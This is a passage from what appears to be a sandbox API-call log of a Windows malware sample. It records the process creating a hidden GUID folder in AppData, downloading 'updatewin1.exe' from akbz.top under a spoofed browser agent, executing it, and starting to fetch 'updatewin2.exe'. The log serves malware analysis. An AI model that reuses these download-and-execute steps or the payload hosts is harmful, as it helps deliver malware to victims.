= 0xb20 Thread: id = 83 os_tid = 0xb30 Thread: id = 84 os_tid = 0xb34 [0122.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x110) returned 0x31ec580 [0122.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x110) returned 0x31ed1b8 [0122.321] GetLastError () returned 0x54f [0122.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x321e260 [0122.321] GetCurrentThreadId () returned 0xb34 [0122.321] SetLastError (dwErrCode=0x54f) [0122.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3222eb0 [0122.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x31fcfc0 [0122.322] GetLastError () returned 0x54f [0122.322] SetLastError (dwErrCode=0x54f) [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3222ef8 [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fa78 [0122.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31fcfc0 | out: hHeap=0x620000) returned 1 [0122.322] GetLastError () returned 0x54f [0122.322] SetLastError (dwErrCode=0x54f) [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f880 [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x48) returned 0x323dac0 [0122.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x320fa78 | out: hHeap=0x620000) returned 1 [0122.322] GetLastError () returned 0x54f [0122.322] SetLastError (dwErrCode=0x54f) [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320fa78 [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x6ff278 [0122.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x323dac0 | out: hHeap=0x620000) returned 1 [0122.322] GetLastError () returned 0x54f [0122.322] SetLastError (dwErrCode=0x54f) [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f810 [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e108 [0122.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6ff278 | out: hHeap=0x620000) returned 1 [0122.322] GetLastError () returned 0x54f [0122.322] SetLastError (dwErrCode=0x54f) [0122.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f6c0 [0122.322] GetLastError () returned 0x54f [0122.322] SetLastError (dwErrCode=0x54f) [0122.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x31ed1b8 | out: hHeap=0x620000) returned 1 [0122.323] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0122.323] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0122.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x400) returned 0x321e628 [0122.323] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x321e628 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0122.323] UuidCreate (in: Uuid=0x9a0d768 | out: Uuid=0x9a0d768) returned 0x0 [0122.325] UuidToStringA (in: Uuid=0x9a0d768, StringUuid=0x9a0d6c0 | out: StringUuid=0x9a0d6c0) returned 0x0 [0122.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x320f7a0 [0122.325] RpcStringFreeA (in: String=0x9a0d6c0 | out: String=0x9a0d6c0) returned 0x0 [0122.325] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="f2685878-c1d9-47fc-b7a6-e4dee8a92594" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594") returned 1 [0122.325] CreateDirectoryA (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594"), lpSecurityAttributes=0x0) returned 1 [0122.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x321ea30 [0122.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x410) returned 0x321ee48 [0122.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1000) returned 0x321f260 [0122.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x321ee48, cbMultiByte=-1, lpWideCharStr=0x321f260, cchWideChar=2048 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594") returned 81 [0122.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1010) returned 0x3220268 [0122.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321f260 | out: hHeap=0x620000) returned 1 [0122.326] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321ee48 | out: hHeap=0x620000) returned 1 [0122.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x31fcfc0 [0122.326] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0122.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3222f40 [0122.326] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221280 [0122.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3222f40, cbMultiByte=-1, lpWideCharStr=0x3221280, cchWideChar=1072 | out: lpWideCharStr="http://akbz.top/files/penelop/updatewin1.exe") returned 45 [0122.327] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3221ae8 [0122.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221280 | out: hHeap=0x620000) returned 1 [0122.327] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3222f40 | out: hHeap=0x620000) returned 1 [0122.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x321ee48 [0122.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3221280 [0122.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://akbz.top/files/penelop/updatewin1.exe", cchWideChar=-1, lpMultiByteStr=0x3221280, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://akbz.top/files/penelop/updatewin1.exe", lpUsedDefaultChar=0x0) returned 45 [0122.333] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x321f6c0 [0122.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221280 | out: hHeap=0x620000) returned 1 [0122.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321ee48 | out: hHeap=0x620000) returned 1 [0122.333] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://akbz.top/files/penelop/updatewin1.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0123.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321f6c0 | out: hHeap=0x620000) returned 1 [0123.371] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9a0d6d0, lpdwBufferLength=0x9a0d710, lpdwIndex=0x0 | out: lpBuffer=0x9a0d6d0*, lpdwBufferLength=0x9a0d710*=0x4, lpdwIndex=0x0) returned 1 [0123.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x32230f0 [0123.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3254b28 [0123.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x32230f0 | out: hHeap=0x620000) returned 1 [0123.373] lstrcpyA (in: lpString1=0x321e628, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594" [0123.373] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594", pMore="updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe") returned 1 [0123.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325ac70 [0123.373] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ec [0123.373] SetFilePointer (in: hFile=0x5ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.408] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.422] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.463] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.464] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.464] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.465] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.572] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.573] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.574] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.574] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.575] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.576] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.576] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.577] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.577] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.577] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.884] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.885] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.885] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.885] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.886] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.886] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.887] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.887] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.887] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.888] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.888] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.888] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.889] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.889] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.930] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.931] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.932] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.932] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.932] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.933] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.933] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.934] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.934] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.935] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.935] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.935] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.936] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.966] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.968] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0x2800) returned 1 [0123.968] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0123.969] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9a0d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9a0d6d8 | out: lpBuffer=0x9a0d778*, lpdwNumberOfBytesRead=0x9a0d6d8*=0xa00) returned 1 [0123.970] WriteFile (in: hFile=0x5ec, lpBuffer=0x9a0d778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x9a0d6dc, lpOverlapped=0x0 | out: lpBuffer=0x9a0d778*, lpNumberOfBytesWritten=0x9a0d6dc*=0xa00, lpOverlapped=0x0) returned 1 [0123.970] CloseHandle (hObject=0x5ec) returned 1 [0123.977] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0123.984] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0123.986] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0126.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325ac70 | out: hHeap=0x620000) returned 1 [0126.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3254b28 | out: hHeap=0x620000) returned 1 [0126.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0126.673] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0126.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3223570 [0126.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0126.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3223570, cbMultiByte=-1, lpWideCharStr=0x3221ae8, cchWideChar=1072 | out: lpWideCharStr="http://akbz.top/files/penelop/updatewin2.exe") returned 45 [0126.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x325bc58 [0126.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0126.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3223570 | out: hHeap=0x620000) returned 1 [0126.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x3221ae8 [0126.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0126.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://akbz.top/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x9aaf2b8, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://akbz.top/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0126.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0126.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 